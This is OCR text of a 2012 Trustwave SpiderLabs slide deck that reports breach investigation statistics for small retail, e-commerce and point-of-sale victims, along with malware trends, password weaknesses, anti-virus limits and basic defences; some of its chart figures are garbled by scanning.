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Trustwave SpiderLabs uses real-world and innovative security research to improve 
Trustwave products, and provides unmatched expertise and intelligence to customers. 
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Response and Investigation (R&l) 

Analysis and Testing (A&T) 
Research and Development (R&D) 
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Marketing made me do it 
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Buzzword Bingo 



How many times are the following words mentioned 
in the conference agenda? 
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Cloud 
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Mobile / Phone / Android A 
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Targeted Attacks 
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Trustwave 2012 Global Security Report 




Results from more than 300 incident response 
and forensic investigations performed in 18 
countries. 

More than 60 IR projects in Australia and New Zealand 

Analysis from more than 2,000 manual 
penetration tests and 2 million network and 
application vulnerability scans. 

Review of more than 25 different anti-virus 
vendors. 

Usage and weakness trends of more then 2 million 
real-world passwords from corporate information 
systems. 
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Targeted Attacks? 

• Two reasons to perform an attack 

• Ideological 

• Financial gain 



Ideological = targeted attack 

• Attacker is motivated by their desire to raise awareness about 
a topic of interest relating to the target 

• Specific target may take longer to compromise but attacker 
invests time due to perceived ideological gain 
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Financial Gain 




Financial gain = path of least resistance 

• For many, this is a business 

• They wish to make the most the can by spending the least 

• Weakest link cliche applies 



Targets chosen on what they are, not who they are 

• Targets chosen as they have a specific vulnerability 

• Attackers invest in tooling targeting these vulnerabilities 

• These bring the marginal cost of compromise down to zero 

• Attackers job is to find as many targets as possible 
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Targeted vs Opportunistic 

• We investigated a single targeted case last year 

• The rest were opportunistic attacks 

• We as a community hear about targeted attacks 

• Compulsory disclosure in USA 

• Larger targets 

• Attackers release details (ideological) 

• We don't hear about opportunistic attacks 
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"Why would they hack me..." 

• This is the first thing we hear from a victim 

• "...I'm just a ..." 

• "... I only process a few credit cards a year" 



Almost all victim businesses were less than 50 employees 



'But my IT guy said everything was safe" 
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System Responsibility 



Self 

24% 




75% of cases: a third party was 
responsible for a major component of 
system admin 



Third Party 

76% 



Source: Trunwrtve 20 1 2 Global Security Report 
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Victim Industries 



Retail 

82<>/o 




Those industries that 
we expect to be 
targets (e.g. Finance, 
critical infrastructure) 
tend to account for a 
small number of cases 
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Victim Assets 



20 



40 



60 80 

i i 

| Software POS 55% 
| E-Cornmerce 40% 
I Employee Workstation 3% 
I Business System 2% 
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E-Commerce Attacks 
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Average Victim 



Experienced bricks and mortar retail outlet that has expanded 
its presence online 

Majority are less than 5,000 transactions per year 

Most make use of off the shelf shopping cart applications 

• X-Cart, Lite Commerce, osCommerce, Zen Cart, Magento, 
Product Cart 

Use third parties for initial setup, hosting and maintenance 

Most sites are borderline profitable 
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Discovery 




Attackers locate potential victims a number of ways 

• Blindly scanning for vulnerabilities 

- Often focus on a single vulnerability 

- Sometimes scan for a handful 

- User agents indicate the use of industry standard tools (e.g. Havij 
for SQL Injection) 

• Googling for strings that identify certain web applications 

- E.g. Pages specific to osCommerce 
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Entry Method 



Remote File 
Inclusion 

3% 45% 



File Upload 
Functionality 

24% 
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Data Harvest Method 




Data Redirection fJ^Tn/ 
5°/0 63% 



In Transit 

320/o 
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Point of Sale Attacks 
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Average Victim 




Experienced bricks and mortar retail outlet 
Often in a rural location 

• Most perceive some safety from not being in "the big smoke" 
Higher volume of transactions compared to e-commerce 
Most make use of one of a handful of software applications 
Use third parties for initial setup, hosting and maintenance 
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Discovery 



Unsure on how attackers discover potential victims 
May be as simple as port scanning Australian IP ranges 
• Some grouping of victims by location 



PIN 
entry device 




"Chargs cusomer $x " 
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Authorization message - 
important fields encrypted 

informs PQS if transaction 
was successful or not 



ACQUIRER 



/ ] 



POS 



Authorization 

Message 
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Entry Method 




Remote Access 
Application 

1 00% 
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Data Harvest Method 
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In Transit 

20% 



Stored 

8OO/0 
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Malware Trends 

Common and targeted 
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Many Differences 

Common 

- Self- propagation 

through vulnerabilities 
or user actions 

- Widely distributed 

- Easily detectable by 

AV vendors 
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Targeted 

- No propagation and 

may not exploits 
vulnerabilities 

- Application/system 
specific 

- Only found in target 
environments 

- Most found in 
Trustwave 2011 
investigations were 
undetectable by AV; 
only 12% bytopAV 
vendors 
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Targeted Malware Types ^^ 


Memory 
Popular Types rogues* — . Parser 


• Memory Parser Network Sniffer 7m — i J« ^^^2.1% 

Obtains data in USe CC Data Interceptor 7.9% — | Jg ^ 


out of system memory 




• Keystroke Loggers m ^^*^^M ^ 

target user and ■ iTVDFl H 
device input RemoteA f r ^ s n s 1 IoIm^wareI 

• Application Specific 10.5% m X^^n^B W 

hook the applications W 
with access to ^p 


target data ^^ 

1 d.Z /O Application Specific 

13.2% 


Source: Trustwave 201 2 Global Security Report 
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Our Defenses 



Basic controls 
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Passwords ^^ 


i 

2.5+ Million Passwords 
Analyzed 

• All in use within 
the enterprise 

Common Weaknesses 

• Shared 'admin' p/w 

• New employee default p/w 

• Poor complexity requirement 

• 5% based on "password" 

• 1% based on "welcome" 




All Lower | 2.064% 

All Upper 0.031 % 
All Number 1 0.240% 
All Special 0.004% 
Lower/Upper 1 0-094% 
Lower/Number | | 36.540% 
Upper/ Number | 1.560% 
Upper/Special 0.004% 
Lower/Special 0.106% 
Number/Special 0,004% 
Lower/Upper/ Number H H 20.311% 
Lower/Upper/Speciai | 0.822% 
Upper/ Number/Special 1 0.256% 
Lowfcr/Number/Special | 5. 1 1 5% 
Lower/ Up per/ Number/Special | ^ 23.349% 
Sane Trj-aaw Hi! aeiti Sku-Cji S^en 


Password 1 


|p«H-ftO 

|ft«MfM 
|tW*wiM 

|PlHHWOf 

|vtt*WM01 

|$pnng30ig 
|sommwn 




C 10000 MMd UWM WW 
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Anti-Virus 
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Source Trusrwave M W Global Security Report 
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Undetected 
Ma I ware 

Not a Silver Bullet 

Information 

asymmetry 
malware 

authors/signature 
writers 

Arms- race, signature 
dependence 

Results 

* 70,000 malicious 
samples 

• A/V identified 81% of 
all samples 

Lowest vendor scored 

JUStg 
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Summary 
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Victims 



Mostly non-technical 

Often relying on a third party for IT 

Rarely a recognisable brand name 

All surprised to learn that they have been compromised 
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Attack Methods 




Attack methods were very simple 

Remote access with weak password for Point of Sales 
systems 

SQL Injection / File Upload / Remote File Inclusion for ecom 

All well understood easy to protect against issues 

No 0-days, no targeted e-mails or social engineering, no 
covering of tracks, nothing fancy 



^Trustwave- 

f i SpiderLabs 



STrustwave- 



17 



4/06/2012 



Defence 



Stopping the majority of the attacks is simple 
Focus on the basics 

Password security 

Secure remote access 

Patch management 

Data retention 

Application security 
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Action Plan 

• Highly targeted attacks are certainly a concern 

• In planning for these, be careful not to lose sight of the 
basics 

• Many of the basic controls are also helpful in preventing 
targeted attacks 

• Ensure that your service providers are well behaved 
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Questions? 
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Resources 




Download the report: www.trustwave.com/GSR 
Follow us online: 

• Twitter: @Trustwave / @SpiderLabs 

• Facebook: http://www.facebook.com/Trustwave 

• Linkedln: http://www.linkedin.com/companv/trustwave 

• Google+: https://plus.qooqle.com/103260594120163717290 
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